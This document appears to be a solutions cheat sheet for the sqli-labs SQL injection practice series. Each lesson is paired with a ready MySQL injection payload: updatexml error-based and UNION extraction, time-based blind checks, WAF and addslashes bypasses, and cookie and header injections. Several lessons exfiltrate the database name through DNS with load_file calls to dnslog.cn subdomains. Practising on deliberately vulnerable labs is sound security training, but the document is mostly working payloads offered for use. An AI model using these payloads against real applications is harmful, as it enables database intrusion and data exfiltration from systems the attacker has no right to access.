Less-1 Error Based- String
' union select updatexml(1,concat(0x7e,(SELECT user())),0x7e) --+
(note: a UNION must match the column count of the original SELECT; if the page returns a column-count error instead of the XPATH syntax error, use the `' and updatexml(...) --+` form from the lessons below instead)
Less-42 Stacked Query error based
2' and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) and '
Less-58
2' and (updatexml(1,concat(0x7e,(SELECT+database())),0x7e)) --+
Less-2 Error Based- Integer
1 union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+
Less-39 Stacked Query Integer type
1 and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) --+
Less-3 Error Based- String (with Twist)
1 ') union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+
Less-40 Stacked Query String type Blind
-1') union select 1,2,database() --+
Less-43
2') and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) and ('
Less-4 Error Based- DoubleQuotes String
1 ") union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+
Less-31 FUN with WAF
2") and updatexml(1,concat(0x7e,(SELECT database())),0x7e) and ("2
Less-60
3") and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) --+
Less-61
3')) and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) --+
Less-6 Double Query- Double Quotes- String
1 " union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+
Less-23 Error Based- no comments
' and updatexml(1,concat(0x7e,(SELECT database())),0x7e) and '''#
Less-25 Trick with OR & AND
2' anandd updatexml(1,concat(0x7e,(SELECT database())),0x7e) anandd '''#
Index5
2' anandd updatexml(1,concat(0x7e,(datadatabasebase())),0x7e)#
Less-26 Trick with comments
2'||updatexml(1,concat(0x7e,(SELECT (database()))),0x7e)||'
Less-32 Bypass addslashes()
2%df%27 and updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+
Less-34 Bypass Add SLASHES
3+%df'+and+updatexml(1,concat(0x7e,(SELECT database())),0x7e)+--+
Index4
1' && updatexml(1,concat(0x7e,(SELECT+database())),0x7e) --+
Less-11 Error Based- String
Username: ' union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+
Password: ' 1
Less-12 Error Based- Double quotes- String
Username: 1" ) union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+(
Password: "1
Less-13 Double Injection- String- with twist
Username: 1') union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+(
Password: ' 1
Less-14 Double Injection- Double quotes- String
Username: 1" union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+
Password: "1
Less-15 Blind- Boolean Based- String
Username: admin' and if(length(database())=8, sleep(1), 1)#
admin' and if(substr(substr((database()), 1),1,1) = 's', sleep(1), 1)#
Less-16 Blind- Time Based- Double quotes- String
admin") and if(length(database())=8, sleep(1), 1)#
Less-17 Update Query- Error based - String
uname=admin&passwd=2' and updatexml(1,concat(0x7e,(SELECT database())),0x7e)--+
Less-18 Header Injection- Error Based- string
', updatexml(1,concat(0x7e,(SELECT database())),0x7e), 1)#
', updatexml(1,concat(0x7e,(SELECT database())),0x7e))#
Less-20 Cookie Injection- Error Based- string
' and updatexml(1,concat(0x7e,(SELECT database())),0x7e)--+
Less-21 Cookie Injection- Error Based- complex - string
a ') and updatexml(1,concat(0x7e,(SELECT database())),0x7e) and ('
Delete the original cookie in Burp and send the following base64-encoded value instead:
uname:YSAgJykgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChTRUxFQ1QgZGF0YWJhc2UoKSkpLDB4N2UpIGFuZCAoJw==
Less-22 Cookie Injection- Error Based- Double Quotes - string
a" and updatexml(1,concat(0x7e,(SELECT database())),0x7e)#
uname=YSIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChTRUxFQ1QgZGF0YWJhc2UoKSkpLDB4N2UpIw==
Less-27a Trick with SELECT & UNION
0"uNiOn%0ASeLEcT%0A1,2,database()%0A uNiOn%0A SeLEcT%0A 1,2,"
Less-28 Trick with SELECT & UNION
0')uni on union%0Aselect%0A sel ect%0A1,2,database()%0Auni on union%0Aselect%0A sel ect%0A1,2,('
Less-28a Trick with SELECT & UNION
0')union union%0Aselect%0A select%0A1,2,database()%0Aunion union%0Aselect%0A select%0A1,2,('
Less-29 Protection with WAF
0'union%0Aselect%0A 1,2,database()%0A union%0Aselect%0A 1,2,'
Less-30
0"union%0Aselect%0A 1,2,database()%0A union%0Aselect%0A 1,2,"
Index4
0'union////select////"","","",database(),"","","","";#
(note: `////` is not a valid MySQL token separator; this was probably `/**/` before the text was extracted -- verify against the original challenge)
Less-9 Blind- Time based- Single Quotes- String
1' and length(database())=8--+
(note: Less-9 returns the same page for true and false, so a plain boolean condition gives no signal; time the response instead, e.g. `1' and if(length(database())=8, sleep(1), 1)--+`)
Less-10 Blind- Time based- Double Quotes- String
1" and length(database())=8--+
(same caveat as Less-9: use `1" and if(length(database())=8, sleep(1), 1)--+` to get a measurable signal)
Less-25a Trick with OR & AND Blind
2 anandd if(length(database())=8, sleep(1), 1)
Less-26a Trick with comments
1') anandd (if(length(database())=8, sleep(1), 1)) anandd('1
Less-44
2';select load_file(concat('\\\\',(select database()),'.ny8562.dnslog.cn\\abc'));
(note: inside a MySQL string literal `\\` collapses to a single backslash unless NO_BACKSLASH_ESCAPES is set, so the UNC prefix must be written `'\\\\'` to yield `\\`. This DNS exfiltration only works when the MySQL server runs on Windows, the account has the FILE privilege and secure_file_priv does not block it; replace the dnslog.cn subdomain with one you control)
Less-64
1 and(select load_file(concat('\\\\',(select database()),'.4kmw9o.dnslog.cn\\abc')))
Less-48
3 and if(1=2,sleep(1), 1) and (select load_file(concat('\\\\',(select database()),'.9o20ch.dnslog.cn\\abc')))#
3 and if(1=1,sleep(1),0); select load_file(concat('\\\\',(select database()),'.j6fykz.dnslog.cn\\abc'));
Less-49
3' and if(1=2,sleep(1), 1) and (select load_file(concat('\\\\',(select database()),'.9o20ch.dnslog.cn\\abc'))) and '#
3' and if(1=1,sleep(1),0);select load_file(concat('\\\\',(select database()),'.j6fykz.dnslog.cn\\abc'));
3' and if(1=1,sleep(1),0) and (select load_file(concat('\\\\',(select database()),'.vsc4qg.dnslog.cn\\abc'))) --+
Less-56
4') and (select load_file(concat('\\\\',(select database()),'.6oq86c.dnslog.cn\\abc'))) --+
Less-57
4" and (select load_file(concat('\\\\',(select database()),'.6oq86c.dnslog.cn\\abc'))) --+
1" and (select load_file(concat('\\\\',(select database()),'.4kmw9o.dnslog.cn\\abc'))) and "
Less-62
3') and if(1=1,sleep(1),0) and (select load_file(concat('\\\\',(select database()),'.vsc4qg.dnslog.cn\\abc'))) --+